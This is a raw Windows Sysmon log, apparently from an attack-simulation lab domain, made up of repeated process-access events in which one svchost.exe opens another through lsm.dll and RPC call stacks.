13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 